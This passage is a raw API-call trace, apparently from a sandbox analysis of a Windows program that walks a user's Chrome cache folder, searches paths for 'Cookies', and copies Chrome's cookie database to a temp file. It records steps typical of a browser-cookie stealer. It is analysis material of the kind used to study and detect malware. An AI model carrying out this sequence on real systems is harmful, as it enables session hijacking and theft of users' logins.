lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\" [0163.014] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\", lpString2="data_0" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\data_0") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\data_0" [0163.014] VirtualQuery (in: lpAddress=0x9256b8, lpBuffer=0x2df090, dwLength=0x1c | out: lpBuffer=0x2df090*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.014] GetProcessHeap () returned 0x8e0000 [0163.014] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9256b8 | out: hHeap=0x8e0000) returned 1 [0163.014] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\data_0", lpSrch="Cookies") returned 0x0 [0163.014] VirtualQuery (in: lpAddress=0x925768, lpBuffer=0x2df09c, dwLength=0x1c | out: lpBuffer=0x2df09c*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.014] GetProcessHeap () returned 0x8e0000 [0163.014] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925768 | out: hHeap=0x8e0000) returned 1 [0163.014] FindNextFileW (in: hFindFile=0x8f9b00, lpFindFileData=0x2df0e0 | out: lpFindFileData=0x2df0e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x805aa0c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x805aa0c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x9c0e3de0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x42000, dwReserved0=0x0, dwReserved1=0x0, cFileName="data_1", cAlternateFileName="")) returned 1 [0163.014] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache") returned 81 [0163.014] lstrlenW (lpString="\\") returned 1 [0163.014] GetProcessHeap () returned 0x8e0000 [0163.014] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xa6) returned 0x9256b8 [0163.014] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache" [0163.015] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\" [0163.015] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\") returned 82 [0163.015] lstrlenW (lpString="data_1") returned 6 [0163.015] GetProcessHeap () returned 0x8e0000 [0163.015] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xb2) returned 0x925768 [0163.015] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\" [0163.015] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\", lpString2="data_1" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\data_1") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\data_1" [0163.015] VirtualQuery (in: lpAddress=0x9256b8, lpBuffer=0x2df090, dwLength=0x1c | out: lpBuffer=0x2df090*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.015] GetProcessHeap () returned 0x8e0000 [0163.015] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9256b8 | out: hHeap=0x8e0000) returned 1 [0163.015] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\data_1", lpSrch="Cookies") returned 0x0 [0163.015] VirtualQuery (in: lpAddress=0x925768, lpBuffer=0x2df09c, dwLength=0x1c | out: lpBuffer=0x2df09c*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.015] GetProcessHeap () returned 0x8e0000 [0163.015] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925768 | out: hHeap=0x8e0000) returned 1 [0163.015] FindNextFileW (in: hFindFile=0x8f9b00, lpFindFileData=0x2df0e0 | out: lpFindFileData=0x2df0e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x805aa0c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x805aa0c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x805aa0c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x0, dwReserved1=0x0, cFileName="data_2", cAlternateFileName="")) returned 1 [0163.015] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache") returned 81 [0163.015] lstrlenW (lpString="\\") returned 1 [0163.015] GetProcessHeap () returned 0x8e0000 [0163.015] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xa6) returned 0x9256b8 [0163.015] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache" [0163.015] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\" [0163.015] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\") returned 82 [0163.015] lstrlenW (lpString="data_2") returned 6 [0163.015] GetProcessHeap () returned 0x8e0000 [0163.015] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xb2) returned 0x925768 [0163.015] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\" [0163.015] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\", lpString2="data_2" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\data_2") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\data_2" [0163.015] VirtualQuery (in: lpAddress=0x9256b8, lpBuffer=0x2df090, dwLength=0x1c | out: lpBuffer=0x2df090*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.015] GetProcessHeap () returned 0x8e0000 [0163.015] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9256b8 | out: hHeap=0x8e0000) returned 1 [0163.015] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\data_2", lpSrch="Cookies") returned 0x0 [0163.015] VirtualQuery (in: lpAddress=0x925768, lpBuffer=0x2df09c, dwLength=0x1c | out: lpBuffer=0x2df09c*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.016] GetProcessHeap () returned 0x8e0000 [0163.016] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925768 | out: hHeap=0x8e0000) returned 1 [0163.016] FindNextFileW (in: hFindFile=0x8f9b00, lpFindFileData=0x2df0e0 | out: lpFindFileData=0x2df0e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x805aa0c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x805aa0c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x9c0e3de0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x402000, dwReserved0=0x0, dwReserved1=0x0, cFileName="data_3", cAlternateFileName="")) returned 1 [0163.016] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache") returned 81 [0163.016] lstrlenW (lpString="\\") returned 1 [0163.016] GetProcessHeap () returned 0x8e0000 [0163.016] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xa6) returned 0x9256b8 [0163.016] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache" [0163.016] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\" [0163.016] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\") returned 82 [0163.016] lstrlenW (lpString="data_3") returned 6 [0163.016] GetProcessHeap () returned 0x8e0000 [0163.016] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xb2) returned 0x925768 [0163.016] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\" [0163.016] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\", lpString2="data_3" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\data_3") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\data_3" [0163.016] VirtualQuery (in: lpAddress=0x9256b8, lpBuffer=0x2df090, dwLength=0x1c | out: lpBuffer=0x2df090*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.016] GetProcessHeap () returned 0x8e0000 [0163.016] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9256b8 | out: hHeap=0x8e0000) returned 1 [0163.016] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\data_3", lpSrch="Cookies") returned 0x0 [0163.016] VirtualQuery (in: lpAddress=0x925768, lpBuffer=0x2df09c, dwLength=0x1c | out: lpBuffer=0x2df09c*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.016] GetProcessHeap () returned 0x8e0000 [0163.016] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925768 | out: hHeap=0x8e0000) returned 1 [0163.016] FindNextFileW (in: hFindFile=0x8f9b00, lpFindFileData=0x2df0e0 | out: lpFindFileData=0x2df0e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x805aa0c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x805aa0c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x805aa0c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x80170, dwReserved0=0x0, dwReserved1=0x0, cFileName="index", cAlternateFileName="")) returned 1 [0163.016] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache") returned 81 [0163.016] lstrlenW (lpString="\\") returned 1 [0163.016] GetProcessHeap () returned 0x8e0000 [0163.016] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xa6) returned 0x9256b8 [0163.016] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache" [0163.016] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\" [0163.016] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\") returned 82 [0163.016] lstrlenW (lpString="index") returned 5 [0163.017] GetProcessHeap () returned 0x8e0000 [0163.017] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xb0) returned 0x925768 [0163.017] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\" [0163.017] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\", lpString2="index" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\index") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\index" [0163.017] VirtualQuery (in: lpAddress=0x9256b8, lpBuffer=0x2df090, dwLength=0x1c | out: lpBuffer=0x2df090*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.017] GetProcessHeap () returned 0x8e0000 [0163.017] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9256b8 | out: hHeap=0x8e0000) returned 1 [0163.017] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\index", lpSrch="Cookies") returned 0x0 [0163.017] VirtualQuery (in: lpAddress=0x925768, lpBuffer=0x2df09c, dwLength=0x1c | out: lpBuffer=0x2df09c*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.017] GetProcessHeap () returned 0x8e0000 [0163.017] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925768 | out: hHeap=0x8e0000) returned 1 [0163.017] FindNextFileW (in: hFindFile=0x8f9b00, lpFindFileData=0x2df0e0 | out: lpFindFileData=0x2df0e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x805aa0c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x805aa0c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x805aa0c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x80170, dwReserved0=0x0, dwReserved1=0x0, cFileName="index", cAlternateFileName="")) returned 0 [0163.017] FindClose (in: hFindFile=0x8f9b00 | out: hFindFile=0x8f9b00) returned 1 [0163.017] VirtualQuery (in: lpAddress=0x925600, lpBuffer=0x2df09c, dwLength=0x1c | out: lpBuffer=0x2df09c*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.017] GetProcessHeap () returned 0x8e0000 [0163.017] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925600 | out: hHeap=0x8e0000) returned 1 [0163.017] VirtualQuery (in: lpAddress=0x925550, lpBuffer=0x2df314, dwLength=0x1c | out: lpBuffer=0x2df314*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.017] GetProcessHeap () returned 0x8e0000 [0163.017] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925550 | out: hHeap=0x8e0000) returned 1 [0163.017] FindNextFileW (in: hFindFile=0x8f9ac0, lpFindFileData=0x2df358 | out: lpFindFileData=0x2df358*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x80d406e0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x80d406e0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x98d1e730, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x1c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Cookies", cAlternateFileName="")) returned 1 [0163.017] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned 75 [0163.017] lstrlenW (lpString="\\") returned 1 [0163.017] GetProcessHeap () returned 0x8e0000 [0163.017] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x9a) returned 0x9254a8 [0163.017] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default" [0163.017] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\" [0163.017] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned 76 [0163.017] lstrlenW (lpString="Cookies") returned 7 [0163.017] GetProcessHeap () returned 0x8e0000 [0163.017] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xa8) returned 0x925550 [0163.017] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\" [0163.018] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\", lpString2="Cookies" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies" [0163.018] VirtualQuery (in: lpAddress=0x9254a8, lpBuffer=0x2df308, dwLength=0x1c | out: lpBuffer=0x2df308*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.018] GetProcessHeap () returned 0x8e0000 [0163.018] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9254a8 | out: hHeap=0x8e0000) returned 1 [0163.018] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies", lpSrch="Cookies") returned="Cookies" [0163.018] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies") returned 83 [0163.018] RtlComputeCrc32 (PartialCrc=0x0, Buffer=0x925550, Length=0xa6) returned 0xdd4d5815 [0163.018] GetProcessHeap () returned 0x8e0000 [0163.018] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x8) returned 0x8fbff8 [0163.018] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\cookies"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0163.018] CloseHandle (hObject=0x160) returned 1 [0163.018] GetProcessHeap () returned 0x8e0000 [0163.018] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x208) returned 0x925600 [0163.018] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x925600 | out: lpBuffer="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\") returned 0x25 [0163.018] GetTempFileNameW (in: lpPathName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\", lpPrefixString=0x0, uUnique=0x0, lpTempFileName=0x925600 | out: lpTempFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\6F29.tmp" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\6f29.tmp")) returned 0x6f29 [0163.020] DeleteFileW (lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\6F29.tmp" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\6f29.tmp")) returned 1 [0163.020] CopyFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\cookies"), lpNewFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\6F29.tmp" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\6f29.tmp"), bFailIfExists=0) returned 1 [0163.025] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x28) returned 0x394b848 [0163.025] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x394b848) returned 0x28 [0163.025] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0xb5) returned 0x394b878 [0163.025] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x394b878) returned 0xb5 [0163.025] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x394b878) returned 0xb5 [0163.025] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x1d8) returned 0x39297d0 [0163.025] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x39297d0) returned 0x1d8 [0163.025] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x43) returned 0x394b938 [0163.025] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x394b938) returned 0x43 [0163.025] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x10) returned 0x392a888 [0163.025] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a888) returned 0x10 [0163.025] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x43) returned 0x39299b0 [0163.025] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x39299b0) returned 0x43 [0163.025] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x10) returned 0x392a870 [0163.025] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a870) returned 0x10 [0163.025] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x42) returned 0x3929a00 [0163.026] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929a00) returned 0x42 [0163.026] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x10) returned 0x392a858 [0163.026] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a858) returned 0x10 [0163.026] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x2f) returned 0x3929a50 [0163.026] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929a50) returned 0x2f [0163.026] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x30) returned 0x3929a88 [0163.026] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929a88) returned 0x30 [0163.026] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x54) returned 0x3929ac0 [0163.026] RtlSizeHeap 